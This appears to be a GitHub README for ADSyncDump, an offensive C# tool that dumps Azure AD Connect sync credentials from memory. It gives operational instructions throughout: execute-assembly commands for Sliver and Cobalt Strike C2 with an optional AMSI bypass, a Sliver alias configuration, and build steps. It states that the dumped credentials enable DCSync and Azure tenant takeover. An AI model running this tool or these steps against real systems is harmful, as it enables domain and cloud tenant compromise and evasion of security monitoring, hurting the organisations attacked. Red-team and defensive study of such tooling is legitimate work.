Language: English | 中文 | Français

C# in-memory credential extractor for Azure AD Connect servers. Extracts both local Active Directory and Azure Active Directory sync credentials without spawning child processes.
- Extract local AD sync account credentials (MSOL_* user with DCSync/Directory Replication rights)
- Extract Azure AD sync account credentials (Global Admin equivalent for Azure tenant takeover)
- In-memory decryption via ADSync service token impersonation, no PowerShell/child process
- Optional AMSI bypass (disabled by default)
- Auto-detect LocalDB instances, supports all AD Connect versions (v1/v2/v3)
- Auto-locate service process via Service Control Manager
- Structured execution logging
- C# 5 compatible, compiles with system csc.exe, no external dependencies
- Works with C2 execute-assembly (Sliver, Cobalt Strike, etc.)
# Default (no AMSI bypass)
execute-assembly ADSyncDump.exe -p notepad.exe
# With AMSI bypass
execute-assembly ADSyncDump.exe -p notepad.exe -- --bypass-amsi
Does reflective in-memory loading via execute-assembly automatically bypass AMSI? See details.
You can register ADSyncDump as a persistent Sliver alias so it is available as adsyncdump across sessions without re-uploading the binary each time.
- Create the alias directory and drop in the binary:
mkdir -p ~/.sliver-client/aliases/adsyncdump
cp ADSyncDump.exe ~/.sliver-client/aliases/adsyncdump/
- Create
alias.jsonin the same directory:
{
"name": "ADSyncDump",
"version": "v0.8.1",
"command_name": "adsyncdump",
"original_author": "RedteamNotes",
"repo_url": "https://github.com/RedteamNotes/ADSyncDump",
"help": "Extract AD and Azure AD credentials from AD Connect servers",
"long_help": "ADSyncDump extracts both local AD and Azure AD sync credentials from Azure AD Connect servers via in-memory service token impersonation. Use --bypass-amsi to enable AMSI bypass.",
"entrypoint": "Main",
"allow_args": true,
"default_args": "",
"is_reflective": false,
"is_assembly": true,
"files": [
{
"os": "windows",
"arch": "amd64",
"path": "ADSyncDump.exe"
}
]
}- Load and verify:
[sliver] > aliases load ~/.sliver-client/aliases/adsyncdump/alias.json
[*] ADSyncDump alias has been loaded
[sliver] (SESSION) > adsyncdump --bypass-amsi
After loading, adsyncdump <args> is equivalent to execute-assembly ADSyncDump.exe -p notepad.exe <args>. The alias persists across Sliver client restarts once loaded. Upgrade by replacing the binary in the alias directory.
| Parameter | Description |
|---|---|
--bypass-amsi |
Enable in-memory AMSI patch |
Two sets of credentials are returned:
- Local AD: MSOL_* account with domain replication rights, usable for DCSync
- Azure AD: Sync service account with Global Admin equivalent rights, usable for Azure tenant takeover
- Windows only: Compilation requires the system .NET Framework C# compiler. Linux/MacOS compilation is not supported (the tool targets Windows exclusively, depends on Win32 APIs and Windows-only components including LocalDB and mcrypt.dll).
- .NET Framework 4.8 (preinstalled on Windows 10 1903+, Windows Server 2016+). No Visual Studio or additional SDK required.
- Must compile as x64: AD Connect runs as a 64-bit process, 32-bit builds will fail to access LocalDB and perform token impersonation.
Run build.bat directly on Windows. The script will automatically locate the system csc.exe compiler and produce a working x64 binary.
Run the following command in Command Prompt or PowerShell:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /platform:x64 /target:exe /out:ADSyncDump.exe ADSyncDump.cs
- No external dependencies or NuGet packages are required. All used assemblies are built into the default .NET Framework 4.x installation.
- Precompiled x64 binaries are available in Releases for direct use without compilation.
- Do not compile with .NET Core/.NET 5+, the binary must target .NET Framework 4.x to run on AD Connect servers without additional runtime dependencies.
- Requires local administrator privileges on the AD Connect server
- All decryption happens in memory, no child processes are spawned
- Tested on Windows Server 2016/2019/2022 with AD Connect v1/v2/v3
- Initial public release
- Local AD + Azure AD credential extraction
- Token impersonation in-memory decryption
- Optional AMSI bypass
- Auto-detect DB instances and service PID
- Technical Deep Dive - Complete breakdown of underlying architecture, cryptographic principles, implementation decisions, OpSec considerations, and failure mode resolutions.